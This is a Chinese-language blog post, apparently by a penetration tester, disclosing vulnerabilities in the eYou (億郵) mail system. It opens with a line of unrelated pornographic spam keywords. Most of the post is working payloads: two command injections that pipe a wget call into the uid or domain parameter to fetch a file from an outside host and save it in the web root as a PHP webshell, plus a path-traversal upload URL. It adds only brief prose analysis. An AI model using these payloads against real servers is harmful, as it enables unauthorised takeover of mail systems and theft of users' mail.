免费视频淫片aa毛片_日韩高清在线亚洲专区vr_日韩大片免费观看视频播放_亚洲欧美国产精品完整版

顯示不全請點擊全屏閱讀

最近在給一家市值過百億美金的公司做滲透測試，發(fā)現(xiàn)其中一個域名用的億郵郵件系統(tǒng)，就順便下了套億郵的源碼看了看，發(fā)現(xiàn)這套系統(tǒng)的安全性還停留在零幾年，問題一大堆，找到一些getshell，簡單列兩個，再擰兩個稍微有意思的漏洞分享一下，就不寫詳細(xì)分析了。

另外過段時間會更新一版代碼審計系統(tǒng)，會加幾種漏洞類型的審計規(guī)則，還有優(yōu)化誤報。這次發(fā)現(xiàn)億郵的所有漏洞都是Seay源代碼審計系統(tǒng)自動化挖掘到的。

命令執(zhí)行1

http://host.com/swfupload/upload_files.php?uid=
|wget+http://www.yourshell.cn/1.txt+-O+/var/eyou/apache/htdocs/swfupload/a.php&domain=

命令執(zhí)行2

GET /admin/domain/ip_login_set/d_ip_login_get.php?allow=allow&type=deny&domain=|wget+http://www.yourshell.cn/1.txt+-O+/var/eyou/apache/htdocs/grad/admin/a.php HTTP/1.1
Host: mail.host.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Length: 0
cookie: cookie=admin 1
DNT: 1
Connection: keep-alive

任意文件上傳

Swfupload/upload_files.php? uid=admin&token=youtoken/../../

這里本來可以無需登陸直接上傳任意文件的，但是在linux下，is_dir()函數(shù)判斷一個路徑是否是目錄，在用../跳轉(zhuǎn)目錄時，必須路徑中的目錄都存在，但是windows下面可以是不存在的路徑，到底是系統(tǒng)問題還是php問題，這個等有時間再去研究。

看看這個圖就明白了

很多文件頭頂還有一個文件包含，但是是http頭里面的host字段，在網(wǎng)站是默認(rèn)情況下，這個host是可以偽造的，但是不能有斜杠這域名中不存在的字符，否則會400錯誤，所以這里只能包含同目錄下面的文件。